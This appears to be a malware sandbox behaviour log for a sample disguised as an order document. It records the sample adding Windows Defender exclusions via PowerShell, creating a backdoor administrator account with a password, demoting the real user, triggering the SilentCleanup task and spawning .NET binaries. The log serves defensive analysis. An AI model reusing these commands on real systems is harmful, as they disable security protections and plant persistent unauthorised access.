                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Queries volume information: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
